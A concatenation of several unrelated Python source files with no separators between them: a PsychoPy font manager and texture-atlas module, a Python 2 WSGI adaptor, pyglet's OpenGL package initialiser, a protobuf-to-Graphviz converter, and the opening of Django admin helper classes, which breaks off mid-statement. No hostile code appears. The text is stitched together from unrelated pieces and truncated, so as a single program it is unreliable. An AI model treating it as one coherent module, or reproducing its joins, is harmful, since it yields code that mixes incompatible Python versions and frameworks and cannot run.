#!/usr/bin/env python # -*- coding: utf-8 -*- """ Created on Sun Nov 10 12:18:45 2013 @author: Sol """ from __future__ import absolute_import, division, print_function from builtins import chr from builtins import object import os import math import numpy as np import unicodedata as ud from matplotlib import font_manager from psychopy.core import getTime from freetype import Face, FT_LOAD_RENDER, FT_LOAD_FORCE_AUTOHINT, FT_Exception from .textureatlas import TextureAtlas from pyglet.gl import (glGenLists, glNewList, GL_COMPILE, GL_QUADS, glBegin, glTexCoord2f, glVertex2f, glEnd, glDeleteLists, glEndList, glTranslatef, glDeleteTextures) log = math.log ceil = math.ceil def nearestPow2(n): return pow(2, int(log(n, 2) + 0.5)) def nextPow2(n): return int(pow(2, ceil(log(n, 2)))) class FontManager(object): """FontManager provides a simple API for finding and loading font files (.ttf) via the FreeType lib The FontManager finds supported font files on the computer and initially creates a dictionary containing the information about available fonts. This can be used to quickly determine what font family names are available on the computer and what styles (bold, italic) are supported for each family. This font information can then be used to create the resources necessary to display text using a given font family, style, size, color, and dpi. The FontManager is currently used by the psychopy.visual.TextBox stim type. A user script can access the FontManager via: font_mngr=visual.textbox.getFontManager() A user script never creates an instance of the FontManager class and should always access it using visual.textbox.getFontManager(). Once a font of a given size and dpi has been created; it is cached by the FontManager and can be used by all TextBox instances created within the experiment. """ freetype_import_error = None font_atlas_dict = {} font_family_styles = [] _available_font_info = {} font_store = None def __init__(self, monospace_only=True): # if FontManager.freetype_import_error: # raise Exception('Appears the freetype library could not load. # Error: %s'%(str(FontManager.freetype_import_error))) self.load_monospace_only = monospace_only self.updateFontInfo(monospace_only) def getFontFamilyNames(self): """Returns a list of the available font family names. """ return list(self._available_font_info.keys()) def getFontStylesForFamily(self, family_name): """For the given family_name, a list of style names supported is returned. """ style_dict = self._available_font_info.get(family_name) if style_dict: return list(style_dict.keys()) def getFontFamilyStyles(self): """Returns a list where each element of the list is a itself a two element list of [font_family_name,[font_style_names_list]] """ return self.font_family_styles def getFontsMatching(self, font_family_name, bold=False, italic=False, font_style=None): """ Returns the list of FontInfo instances that match the provided font_family_name and style information. If no matching fonts are found, None is returned. """ style_dict = self._available_font_info.get(font_family_name) if style_dict is None: return None if font_style and font_style in style_dict: return style_dict[font_style] for style, fonts in style_dict.items(): b, i = self.booleansFromStyleName(style) if b == bold and i == italic: return fonts return None def addFontFile(self, font_path, monospace_only=True): """ Add a Font File to the FontManger font search space. The font_path must be a valid path including the font file name. 
Relative paths can be used, with the current working directory being the origin. If monospace_only is True, the font file will only be added if it is a monospace font (as only monospace fonts are currently supported by TextBox). Adding a Font to the FontManager is not persistent across runs of the script, so any extra font paths need to be added each time the script starts. """ return self.addFontFiles((font_path,), monospace_only) def addFontFiles(self, font_paths, monospace_only=True): """ Add a list of font files to the FontManger font search space. Each element of the font_paths list must be a valid path including the font file name. Relative paths can be used, with the current working directory being the origin. If monospace_only is True, each font file will only be added if it is a monospace font (as only monospace fonts are currently supported by TextBox). Adding fonts to the FontManager is not persistent across runs of the script, so any extra font paths need to be added each time the script starts. """ fi_list = [] for fp in font_paths: if os.path.isfile(fp) and os.path.exists(fp): face = Face(fp) if monospace_only: if face.is_fixed_width: fi_list.append(self._createFontInfo(fp, face)) else: fi_list.append(self._createFontInfo(fp, face)) self.font_family_styles.sort() return fi_list def addFontDirectory(self, font_dir, monospace_only=True, recursive=False): """ Add any font files found in font_dir to the FontManger font search space. Each element of the font_paths list must be a valid path including the font file name. Relative paths can be used, with the current working directory being the origin. If monospace_only is True, each font file will only be added if it is a monospace font (as only monospace fonts are currently supported by TextBox). Adding fonts to the FontManager is not persistent across runs of the script, so any extra font paths need to be added each time the script starts. """ from os import walk font_paths = [] for (dirpath, dirnames, filenames) in walk(font_dir): ttf_files = [os.path.join(dirpath, fname) for fname in filenames if fname.lower().endswith('.ttf')] font_paths.extend(ttf_files) if not recursive: break return self.addFontFiles(font_paths) return fi # Class methods for FontManager below this comment should not need to be # used by user scripts in most situations. Accessing them is okay. @staticmethod def getGLFont(font_family_name, size=32, bold=False, italic=False, dpi=72): """ Return a FontAtlas object that matches the family name, style info, and size provided. FontAtlas objects are cached, so if multiple TextBox instances use the same font (with matching font properties) then the existing FontAtlas is returned. Otherwise, a new FontAtlas is created , added to the cache, and returned. """ from psychopy.visual.textbox import getFontManager fm = getFontManager() if fm: font_infos = fm.getFontsMatching(font_family_name, bold, italic) if len(font_infos) == 0: return False font_info = font_infos[0] fid = MonospaceFontAtlas.getIdFromArgs(font_info, size, dpi) font_atlas = fm.font_atlas_dict.get(fid) if font_atlas is None: font_atlas = fm.font_atlas_dict.setdefault( fid, MonospaceFontAtlas(font_info, size, dpi)) font_atlas.createFontAtlas() if fm.font_store: t1 = getTime() fm.font_store.addFontAtlas(font_atlas) t2 = getTime() print('font store add atlas:', t2 - t1) return font_atlas def getFontInfo(self, refresh=False, monospace=True): """ Returns the available font information as a dict of dict's. 
The first level dict has keys for the available font families. The second level dict has keys for the available styles of the associated font family. The values in the second level font family - style dict are each a list containing FontInfo objects. There is one FontInfo object for each physical font file found that matches the associated font family and style. """ if refresh or not self._available_font_info: self.updateFontInfo(monospace) return self._available_font_info def updateFontInfo(self, monospace_only=True): self._available_font_info.clear() del self.font_family_styles[:] fonts_found = font_manager.findSystemFonts() self.addFontFiles(fonts_found, monospace_only) def booleansFromStyleName(self, style): """ For the given style name, return a bool indicating if the font is bold, and a second indicating if it is italics. """ italic = False bold = False s = style.lower().strip() if s == 'regular': return False, False if s.find(b'italic') >= 0 or s.find(b'oblique') >= 0: italic = True if s.find(b'bold') >= 0: bold = True return bold, italic def _createFontInfo(self, fp, fface): fns = (fface.family_name, fface.style_name) if fns in self.font_family_styles: pass else: self.font_family_styles.append( (fface.family_name, fface.style_name)) styles_for_font_dict = self._available_font_info.setdefault( fface.family_name, {}) fonts_for_style = styles_for_font_dict.setdefault(fface.style_name, []) fi = FontInfo(fp, fface) fonts_for_style.append(fi) return fi def __del__(self): self.font_store = None if self.font_atlas_dict: self.font_atlas_dict.clear() self.font_atlas_dict = None if self._available_font_info: self._available_font_info.clear() self._available_font_info = None class FontInfo(object): def __init__(self, fp, face): self.path = fp self.family_name = face.family_name self.style_name = face.style_name self.charmaps = [charmap.encoding_name for charmap in face.charmaps] self.num_faces = face.num_faces self.num_glyphs = face.num_glyphs #self.size_info= [dict(width=s.width,height=s.height, # x_ppem=s.x_ppem,y_ppem=s.y_ppem) for s in face.available_sizes] self.units_per_em = face.units_per_EM self.monospace = face.is_fixed_width self.charmap_id = face.charmap.index self.label = "%s_%s" % (face.family_name, face.style_name) self.id = self.label def getID(self): return self.id def asdict(self): d = {} for k, v in self.__dict__.items(): if k[0] != '_': d[k] = v return d class MonospaceFontAtlas(object): def __init__(self, font_info, size, dpi): self.font_info = font_info self.size = size self.dpi = dpi self.id = self.getIdFromArgs(font_info, size, dpi) self._face = Face(font_info.path) self._face.set_char_size(height=self.size * 64, vres=self.dpi) self.charcode2glyph = None self.charcode2unichr = None self.charcode2displaylist = None self.max_ascender = None self.max_descender = None self.max_tile_width = None self.max_tile_height = None self.max_bitmap_size = None self.total_bitmap_area = 0 self.atlas = None def getID(self): return self.id @staticmethod def getIdFromArgs(font_info, size, dpi): return "%s_%d_%d" % (font_info.getID(), size, dpi) def createFontAtlas(self): if self.atlas: self.atlas.free() self.atlas = None self.charcode2glyph = {} self.charcode2unichr = {} self.max_ascender = None self.max_descender = None self.max_tile_width = None self.max_tile_height = None self.max_bitmap_size = None self.total_bitmap_area = 0 # load font glyphs and calculate max. char size. # This is used when the altas is created to properly size the tex. # i.e. 
max glyph size * num glyphs max_w, max_h = 0, 0 max_ascender, max_descender, max_tile_width = 0, 0, 0 face = self._face face.set_char_size(height=self.size * 64, vres=self.dpi) # Create texAtlas for glyph set. x_ppem = face.size.x_ppem y_ppem = face.size.x_ppem units_ppem = self.font_info.units_per_em est_max_width = ((face.bbox.xMax - face.bbox.xMin) / float(units_ppem) * x_ppem) est_max_height = face.size.ascender / float(units_ppem) * y_ppem target_atlas_area = int( est_max_width * est_max_height) * face.num_glyphs # make sure it is big enough. ;) # height is trimmed before sending to video ram anyhow. target_atlas_area = target_atlas_area * 3.0 pow2_area = nextPow2(target_atlas_area) atlas_width = 2048 atlas_height = pow2_area / atlas_width self.atlas = TextureAtlas(atlas_width, atlas_height * 2) charcode, gindex = face.get_first_char() while gindex: uchar = chr(charcode) if ud.category(uchar) not in (u'Zl', u'Zp', u'Cc', u'Cf', u'Cs', u'Co', u'Cn'): self.charcode2unichr[charcode] = uchar face.load_char(uchar, FT_LOAD_RENDER | FT_LOAD_FORCE_AUTOHINT) bitmap = face.glyph.bitmap self.total_bitmap_area += bitmap.width * bitmap.rows max_ascender = max(max_ascender, face.glyph.bitmap_top) max_descender = max( max_descender, bitmap.rows - face.glyph.bitmap_top) max_tile_width = max(max_tile_width, bitmap.width) max_w = max(bitmap.width, max_w) max_h = max(bitmap.rows, max_h) x, y, w, h = self.atlas.get_region( bitmap.width + 2, bitmap.rows + 2) if x < 0: msg = ("MonospaceFontAtlas.get_region failed " "for: {0}, requested area: {1}. Atlas Full!") vals = charcode, (bitmap.width + 2, bitmap.rows + 2) raise Exception(msg.format(vals)) x, y = x + 1, y + 1 w, h = w - 2, h - 2 data = np.array( bitmap._FT_Bitmap.buffer[:(bitmap.rows * bitmap.width)], dtype=np.ubyte).reshape(h, w, 1) self.atlas.set_region((x, y, w, h), data) self.charcode2glyph[charcode] = dict( offset=(face.glyph.bitmap_left, face.glyph.bitmap_top), size=(w, h), atlas_coords=(x, y, w, h), texcoords=[x, y, x + w, y + h], index=gindex, unichar=uchar) charcode, gindex = face.get_next_char(charcode, gindex) self.max_ascender = max_ascender self.max_descender = max_descender self.max_tile_width = max_tile_width self.max_tile_height = max_ascender + max_descender self.max_bitmap_size = max_w, max_h # resize atlas height = nextPow2(self.atlas.max_y + 1) self.atlas.resize(height) self.atlas.upload() self.createDisplayLists() self._face = None def createDisplayLists(self): glyph_count = len(self.charcode2unichr) max_tile_width = self.max_tile_width max_tile_height = self.max_tile_height display_lists_for_chars = {} base = glGenLists(glyph_count) for i, (charcode, glyph) in enumerate(self.charcode2glyph.items()): dl_index = base + i uchar = self.charcode2unichr[charcode] # update tex coords to reflect earlier resize of atlas height. 
gx1, gy1, gx2, gy2 = glyph['texcoords'] gx1 = gx1/float(self.atlas.width) gy1 = gy1/float(self.atlas.height) gx2 = gx2/float(self.atlas.width) gy2 = gy2/float(self.atlas.height) glyph['texcoords'] = [gx1, gy1, gx2, gy2] glNewList(dl_index, GL_COMPILE) if uchar not in [u'\t', u'\n']: glBegin(GL_QUADS) x1 = glyph['offset'][0] x2 = x1 + glyph['size'][0] y1 = (self.max_ascender - glyph['offset'][1]) y2 = y1 + glyph['size'][1] glTexCoord2f(gx1, gy2), glVertex2f(x1, -y2) glTexCoord2f(gx1, gy1), glVertex2f(x1, -y1) glTexCoord2f(gx2, gy1), glVertex2f(x2, -y1) glTexCoord2f(gx2, gy2), glVertex2f(x2, -y2) glEnd() glTranslatef(max_tile_width, 0, 0) glEndList() display_lists_for_chars[charcode] = dl_index self.charcode2displaylist = display_lists_for_chars def saveGlyphBitmap(self, file_name=None): if file_name is None: import os file_name = os.path.join(os.getcwd(), self.getID().lower().replace(u' ', u'_') + '.png') from scipy import misc if self.atlas is None: self.loadAtlas() if self.atlas.depth == 1: misc.imsave(file_name, self.atlas.data.reshape( self.atlas.data.shape[:2])) else: misc.imsave(file_name, self.atlas.data) def __del__(self): self._face = None if self.atlas.texid is not None: #glDeleteTextures(1, self.atlas.texid) self.atlas.texid = None self.atlas = None if self.charcode2displaylist is not None: # for dl in self.charcode2displaylist.values(): # glDeleteLists(dl, 1) self.charcode2displaylist.clear() self.charcode2displaylist = None if self.charcode2glyph is not None: self.charcode2glyph.clear() self.charcode2glyph = None if self.charcode2unichr is not None: self.charcode2unichr.clear() self.charcode2unichr = None
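# Usage sketch for the API documented above (wrapped in a helper so nothing
# runs at import time). It assumes PsychoPy with the TextBox stim; the
# 'Courier New' family is only an illustration and may not be installed, so
# it is checked first. getGLFont() uploads a texture atlas, which is why an
# OpenGL context (a visual.Window) is created before calling it.
def _font_manager_demo():
    from psychopy import visual

    win = visual.Window(units='pix')
    font_mngr = visual.textbox.getFontManager()

    print('Monospace families:', font_mngr.getFontFamilyNames())

    if 'Courier New' in font_mngr.getFontFamilyNames():
        print('Styles:', font_mngr.getFontStylesForFamily('Courier New'))
        # The resulting MonospaceFontAtlas is cached, so asking again with
        # the same family, size and dpi returns the same object.
        atlas = font_mngr.getGLFont('Courier New', size=18, dpi=72)
        print('Atlas id:', atlas.getID())

    win.close()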
import cStringIO, urllib, time, traceback import odict class ClientConn: def __init__(self, address): self.address = address class Request: def __init__(self, client_conn, scheme, method, path, headers, content): self.scheme, self.method, self.path = scheme, method, path self.headers, self.content = headers, content self.client_conn = client_conn def date_time_string(): """Return the current date and time formatted for a message header.""" WEEKS = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun'] MONTHS = [None, 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'] now = time.time() year, month, day, hh, mm, ss, wd, y, z = time.gmtime(now) s = "%s, %02d %3s %4d %02d:%02d:%02d GMT" % ( WEEKS[wd], day, MONTHS[month], year, hh, mm, ss) return s class WSGIAdaptor: def __init__(self, app, domain, port, sversion): self.app, self.domain, self.port, self.sversion = app, domain, port, sversion def make_environ(self, request, errsoc): if '?' in request.path: path_info, query = request.path.split('?', 1) else: path_info = request.path query = '' environ = { 'wsgi.version': (1, 0), 'wsgi.url_scheme': request.scheme, 'wsgi.input': cStringIO.StringIO(request.content), 'wsgi.errors': errsoc, 'wsgi.multithread': True, 'wsgi.multiprocess': False, 'wsgi.run_once': False, 'SERVER_SOFTWARE': self.sversion, 'REQUEST_METHOD': request.method, 'SCRIPT_NAME': '', 'PATH_INFO': urllib.unquote(path_info), 'QUERY_STRING': query, 'CONTENT_TYPE': request.headers.get('Content-Type', [''])[0], 'CONTENT_LENGTH': request.headers.get('Content-Length', [''])[0], 'SERVER_NAME': self.domain, 'SERVER_PORT': str(self.port), # FIXME: We need to pick up the protocol read from the request. 'SERVER_PROTOCOL': "HTTP/1.1", } if request.client_conn.address: environ["REMOTE_ADDR"], environ["REMOTE_PORT"] = request.client_conn.address for key, value in request.headers.items(): key = 'HTTP_' + key.upper().replace('-', '_') if key not in ('HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH'): environ[key] = value return environ def error_page(self, soc, headers_sent, s): """ Make a best-effort attempt to write an error page. If headers are already sent, we just bung the error into the page. 
""" c = """ <html> <h1>Internal Server Error</h1> <pre>%s"</pre> </html> """%s if not headers_sent: soc.write("HTTP/1.1 500 Internal Server Error\r\n") soc.write("Content-Type: text/html\r\n") soc.write("Content-Length: %s\r\n"%len(c)) soc.write("\r\n") soc.write(c) def serve(self, request, soc): state = dict( response_started = False, headers_sent = False, status = None, headers = None ) def write(data): if not state["headers_sent"]: soc.write("HTTP/1.1 %s\r\n"%state["status"]) h = state["headers"] if 'server' not in h: h["Server"] = [self.sversion] if 'date' not in h: h["Date"] = [date_time_string()] soc.write(str(h)) soc.write("\r\n") state["headers_sent"] = True if data: soc.write(data) soc.flush() def start_response(status, headers, exc_info=None): if exc_info: try: if state["headers_sent"]: raise exc_info[0], exc_info[1], exc_info[2] finally: exc_info = None elif state["status"]: raise AssertionError('Response already started') state["status"] = status state["headers"] = odict.ODictCaseless(headers) return write errs = cStringIO.StringIO() try: dataiter = self.app(self.make_environ(request, errs), start_response) for i in dataiter: write(i) if not state["headers_sent"]: write("") except Exception: try: s = traceback.format_exc() errs.write(s) self.error_page(soc, state["headers_sent"], s) except Exception: # pragma: no cover pass return errs.getvalue()
# ---------------------------------------------------------------------------- # pyglet # Copyright (c) 2006-2008 Alex Holkner # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # * Neither the name of pyglet nor the names of its # contributors may be used to endorse or promote products # derived from this software without specific prior written # permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # ---------------------------------------------------------------------------- '''OpenGL and GLU interface. This package imports all OpenGL, GLU and registered OpenGL extension functions. Functions have identical signatures to their C counterparts. For example:: from pyglet.gl import * # [...omitted: set up a GL context and framebuffer] glBegin(GL_QUADS) glVertex3f(0, 0, 0) glVertex3f(0.1, 0.2, 0.3) glVertex3f(0.1, 0.2, 0.3) glEnd() OpenGL is documented in full at the `OpenGL Reference Pages`_. The `OpenGL Programming Guide`_ is a popular reference manual organised by topic. The free online version documents only OpenGL 1.1. `Later editions`_ cover more recent versions of the API and can be purchased from a book store. .. _OpenGL Reference Pages: http://www.opengl.org/documentation/red_book/ .. _OpenGL Programming Guide: http://fly.cc.fer.hr/~unreal/theredbook/ .. _Later editions: http://www.opengl.org/documentation/red_book/ The following subpackages are imported into this "mega" package already (and so are available by importing ``pyglet.gl``): ``pyglet.gl.gl`` OpenGL ``pyglet.gl.glu`` GLU ``pyglet.gl.gl.glext_arb`` ARB registered OpenGL extension functions These subpackages are also available, but are not imported into this namespace by default: ``pyglet.gl.glext_nv`` nVidia OpenGL extension functions ``pyglet.gl.agl`` AGL (Mac OS X OpenGL context functions) ``pyglet.gl.glx`` GLX (Linux OpenGL context functions) ``pyglet.gl.glxext_arb`` ARB registered GLX extension functions ``pyglet.gl.glxext_nv`` nvidia GLX extension functions ``pyglet.gl.wgl`` WGL (Windows OpenGL context functions) ``pyglet.gl.wglext_arb`` ARB registered WGL extension functions ``pyglet.gl.wglext_nv`` nvidia WGL extension functions The information modules are provided for convenience, and are documented below. 
''' __docformat__ = 'restructuredtext' __version__ = '$Id$' from pyglet.gl.lib import GLException from pyglet.gl.gl import * from pyglet.gl.glu import * from pyglet.gl.glext_arb import * from pyglet.gl import gl_info import sys as _sys _is_epydoc = hasattr(_sys, 'is_epydoc') and _sys.is_epydoc #: The active OpenGL context. #: #: You can change the current context by calling `Context.set_current`; do not #: modify this global. #: #: :type: `Context` #: #: :since: pyglet 1.1 current_context = None def get_current_context(): '''Return the active OpenGL context. You can change the current context by calling `Context.set_current`. :deprecated: Use `current_context` :rtype: `Context` :return: the context to which OpenGL commands are directed, or None if there is no selected context. ''' return current_context class ContextException(Exception): pass class ConfigException(Exception): pass import pyglet as _pyglet if _pyglet.options['debug_texture']: _debug_texture_total = 0 _debug_texture_sizes = {} _debug_texture = None def _debug_texture_alloc(texture, size): global _debug_texture_total _debug_texture_sizes[texture] = size _debug_texture_total += size print '%d (+%d)' % (_debug_texture_total, size) def _debug_texture_dealloc(texture): global _debug_texture_total size = _debug_texture_sizes[texture] del _debug_texture_sizes[texture] _debug_texture_total -= size print '%d (-%d)' % (_debug_texture_total, size) _glBindTexture = glBindTexture def glBindTexture(target, texture): global _debug_texture _debug_texture = texture return _glBindTexture(target, texture) _glTexImage2D = glTexImage2D def glTexImage2D(target, level, internalformat, width, height, border, format, type, pixels): try: _debug_texture_dealloc(_debug_texture) except KeyError: pass if internalformat in (1, GL_ALPHA, GL_INTENSITY, GL_LUMINANCE): depth = 1 elif internalformat in (2, GL_RGB16, GL_RGBA16): depth = 2 elif internalformat in (3, GL_RGB): depth = 3 else: depth = 4 # Pretty crap assumption size = (width + 2 * border) * (height + 2 * border) * depth _debug_texture_alloc(_debug_texture, size) return _glTexImage2D(target, level, internalformat, width, height, border, format, type, pixels) _glDeleteTextures = glDeleteTextures def glDeleteTextures(n, textures): if not hasattr(textures, '__len__'): _debug_texture_dealloc(textures.value) else: for i in range(n): _debug_texture_dealloc(textures[i].value) return _glDeleteTextures(n, textures) def _create_shadow_window(): global _shadow_window import pyglet if not pyglet.options['shadow_window'] or _is_epydoc: return from pyglet.window import Window _shadow_window = Window(width=1, height=1, visible=False) _shadow_window.switch_to() from pyglet import app app.windows.remove(_shadow_window) from base import ObjectSpace, CanvasConfig, Context if _is_epydoc: from base import Config elif _sys.platform in ('win32', 'cygwin'): from win32 import Win32Config as Config elif _sys.platform.startswith('linux'): from xlib import XlibConfig as Config elif _sys.platform == 'darwin': if _pyglet.options['darwin_cocoa']: from cocoa import CocoaConfig as Config else: from carbon import CarbonConfig as Config del base # XXX remove _shadow_window = None # Import pyglet.window now if it isn't currently being imported (this creates # the shadow window). if (not _is_epydoc and 'pyglet.window' not in _sys.modules and _pyglet.options['shadow_window']): # trickery is for circular import _pyglet.gl = _sys.modules[__name__] import pyglet.window
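# Small sketch, using only names defined in this module, of the preferred way
# to reach the active context: the module-level `current_context`, with
# get_current_context() kept for backwards compatibility. A context only
# exists after a window has been created; the hidden window below is purely
# illustrative and the function is never called at import time.
def _context_example():
    import pyglet
    window = pyglet.window.Window(visible=False)
    assert current_context is get_current_context()
    print gl_info.get_version()
    window.close()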
import sys from os.path import isfile import argparse from antlr4 import * from ProtoLexer import ProtoLexer from ProtoParser import ProtoParser, ProtoParserListener from os.path import split, join, realpath class BaseListener(ProtoParserListener): _processed_files = [] def __init__(self, targeted_dir, import_dirs, ostream): self._targeted_dir = targeted_dir self._import_dirs = import_dirs self._ostream = ostream # def exitProto(self, ctx): # print("Oh, a proto!") def give_me_some_import_file(self, import_file_name): realpath_import_file_name = realpath(join(self._targeted_dir, import_file_name)) if isfile(realpath_import_file_name): return realpath_import_file_name realpath_import_file_name = realpath(import_file_name) if isfile(realpath_import_file_name): return realpath_import_file_name for d in self._import_dirs: realpath_import_file_name = realpath(join(d, import_file_name)) #print ('?: %s' % realpath_import_file_name, file=sys.stderr) if isfile(realpath_import_file_name): return realpath_import_file_name raise Exception("Can't find any file as for '%s'. You may want to specify -I dir for a import search path" % import_file_name) def exitImport_file_name(self, ctx): # print("oh, a file name...") # print(dir(ctx)) import_file_name = ctx.getText()[1:] import_file_name = import_file_name[:(len(import_file_name) - 1)] pathname = self.give_me_some_import_file(import_file_name) if len(list(ctx.parentCtx.getChildren())) != 2: raise Exception('This form of import is not supported yet, sorry.') if pathname not in self._processed_files: self._processed_files.append(pathname) FileToTreeParser(pathname, self._import_dirs, ostream=self._ostream) class DotListener(BaseListener): _basic_types = ['double', 'float', 'int32', 'int64', 'uint32', 'uint64', 'sint32', 'sint64', 'fixed32', 'fixed64', 'sfixed32', 'sfixed64', 'bool', 'string', 'bytes'] _prologue = '''digraph G { fontname = "Bitstream Vera Sans" fontsize = 8 node [ fontname = "Bitstream Vera Sans" fontsize = 8 shape = "record" ] edge [ fontname = "Bitstream Vera Sans" fontsize = 8 arrowhead = diamond labeldistance = 2 ] ''' _epilogue = '\n}\n' _attribute_fmt = '+ %(attribute_name)s : %(attribute_type)s\l' _node_prologue_fmt = ''' %(class_name)s [ label = "{%(class_name)s|''' _node_epilogue_fmt = '|}"\n ]' def __init__(self, targeted_dir, import_dirs, ostream): super().__init__(targeted_dir, import_dirs, ostream) self._aggregations = [] def enterMessage_def(self, ctx): class_name = ctx.getChild(1).getText() print(self._node_prologue_fmt % { 'class_name' : class_name }, file=self._ostream) self._curr_message = class_name def exitMessage_def(self, ctx): print(self._node_epilogue_fmt, file=self._ostream) def exitMessage_item_def(self, ctx): qualifier = ctx.getChild(0).getText().lower() attribute_type = ctx.getChild(1).getText() attribute_name = ctx.getChild(2).getText() if attribute_type in self._basic_types: print(self._attribute_fmt % {'attribute_name' : attribute_name, 'attribute_type' : attribute_type}, file=self._ostream) else: if qualifier == 'optional': quantifier = '"0..1"' if qualifier == 'required': quantifier = '"1"' if qualifier == 'repeated': quantifier = '"0..*"' self._aggregations.append((attribute_type, self._curr_message, "1", attribute_name, quantifier)) def exitProto(self, ctx): # from pprint import pprint # pprint(self._aggregations) for edge in self._aggregations: # print('E: %s' % str(edge)) print(' edge[headlabel=%s, label=%s, taillabel=%s]\n' % edge[2:], file=self._ostream) print(' %s -> %s\n' % edge[:2], 
file=self._ostream) class FileToTreeParser(object): def __init__(self, pathname, import_dirs, ostream): self._pathname = pathname self._dir, self._filename = split(pathname) input = FileStream(pathname) lexer = ProtoLexer(input) stream = CommonTokenStream(lexer) parser = ProtoParser(stream) self._tree = parser.proto() printer = DotListener(targeted_dir=self._dir, import_dirs = import_dirs, ostream=ostream) walker = ParseTreeWalker() walker.walk(printer, self._tree) def non_cli_main(pathname_protobuf_ifile, import_dirs, ostream=sys.stdout): print(DotListener._prologue, file=ostream) file_to_tree_parser = FileToTreeParser(pathname_protobuf_ifile, import_dirs=import_dirs, ostream=ostream) print(DotListener._epilogue, file=ostream) # print (file_to_tree_parser._tree.toStringTree()) # print('------') def cli_main(): parser = argparse.ArgumentParser() parser.add_argument('-I', '--proto_path', help='search also this colon-separated list of directories for proto imports') parser.add_argument('proto_file') args = parser.parse_args() import_dirs = args.proto_path.split(':') if args.proto_path else [] non_cli_main(pathname_protobuf_ifile = args.proto_file, import_dirs = import_dirs, ostream=sys.stdout) if __name__ == '__main__': cli_main()
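# Hypothetical programmatic usage (the file name addressbook.proto and the
# protos/ search directory are illustrative, not shipped with this script):
# the same thing cli_main() does, but driven from code. non_cli_main() emits
# Graphviz "dot" text, which can then be rendered with Graphviz separately.
def example_run():
    with open('classes.dot', 'w') as dot_file:
        non_cli_main(pathname_protobuf_ifile='addressbook.proto',
                     import_dirs=['protos'],
                     ostream=dot_file)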
from django import forms from django.conf import settings from django.contrib.admin.util import flatten_fieldsets, lookup_field from django.contrib.admin.util import display_for_field, label_for_field from django.contrib.contenttypes.models import ContentType from django.core.exceptions import ObjectDoesNotExist from django.db.models.fields.related import ManyToManyRel from django.forms.util import flatatt from django.template.defaultfilters import capfirst from django.utils.encoding import force_unicode, smart_unicode from django.utils.html import escape, conditional_escape from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _ ACTION_CHECKBOX_NAME = '_selected_action' class ActionForm(forms.Form): action = forms.ChoiceField(label=_('Action:')) select_across = forms.BooleanField(label='', required=False, initial=0, widget=forms.HiddenInput({'class': 'select-across'})) checkbox = forms.CheckboxInput({'class': 'action-select'}, lambda value: False) class AdminForm(object): def __init__(self, form, fieldsets, prepopulated_fields, readonly_fields=None, model_admin=None): self.form, self.fieldsets = form, normalize_fieldsets(fieldsets) self.prepopulated_fields = [{ 'field': form[field_name], 'dependencies': [form[f] for f in dependencies] } for field_name, dependencies in prepopulated_fields.items()] self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields def __iter__(self): for name, options in self.fieldsets: yield Fieldset(self.form, name, readonly_fields=self.readonly_fields, model_admin=self.model_admin, **options ) def first_field(self): try: fieldset_name, fieldset_options = self.fieldsets[0] field_name = fieldset_options['fields'][0] if not isinstance(field_name, basestring): field_name = field_name[0] return self.form[field_name] except (KeyError, IndexError): pass try: return iter(self.form).next() except StopIteration: return None def _media(self): media = self.form.media for fs in self: media = media + fs.media return media media = property(_media) class Fieldset(object): def __init__(self, form, name=None, readonly_fields=(), fields=(), classes=(), description=None, model_admin=None): self.form = form self.name, self.fields = name, fields self.classes = u' '.join(classes) self.description = description self.model_admin = model_admin self.readonly_fields = readonly_fields def _media(self): if 'collapse' in self.classes: js = ['js/jquery.min.js', 'js/jquery.init.js', 'js/collapse.min.js'] return forms.Media(js=['%s%s' % (settings.ADMIN_MEDIA_PREFIX, url) for url in js]) return forms.Media() media = property(_media) def __iter__(self): for field in self.fields: yield Fieldline(self.form, field, self.readonly_fields, model_admin=self.model_admin) class Fieldline(object): def __init__(self, form, field, readonly_fields=None, model_admin=None): self.form = form # A django.forms.Form instance if not hasattr(field, "__iter__"): self.fields = [field] else: self.fields = field self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields def __iter__(self): for i, field in enumerate(self.fields): if field in self.readonly_fields: yield AdminReadonlyField(self.form, field, is_first=(i == 0), model_admin=self.model_admin) else: yield AdminField(self.form, field, is_first=(i == 0)) def errors(self): return mark_safe(u'\n'.join([self.form[f].errors.as_ul() for f in self.fields if f not in self.readonly_fields]).strip('\n')) class 
